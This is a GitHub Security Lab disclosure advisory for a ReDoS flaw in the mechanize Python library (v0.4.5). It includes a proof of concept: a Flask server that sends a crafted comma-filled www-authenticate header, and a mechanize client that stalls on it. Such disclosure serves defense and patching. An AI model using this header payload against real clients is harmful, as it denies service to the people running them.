Coordinated Disclosure Timeline

Summary

mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

mechanize

Tested Version

v0.4.5

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.

Vulnerability

The vulnerable regular expression is here.

mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.

The reproduction steps below first start a webserver, and then starts mechanize. You can try to delete the resp.headers[... line to see how mechanize should behave.

from flask import Flask, make_response
app = Flask(__name__)

@app.route("/")
def home():
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp

if __name__ == "__main__":
    app.run(debug=True, port=8080)
import mechanize 

br = mechanize.Browser()
br.add_password("http://localhost:8080", "admin", "password")
br.open("http://localhost:8080")

Impact

This issue may lead to a denial of service.

CVE

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-108 in any communication regarding this issue.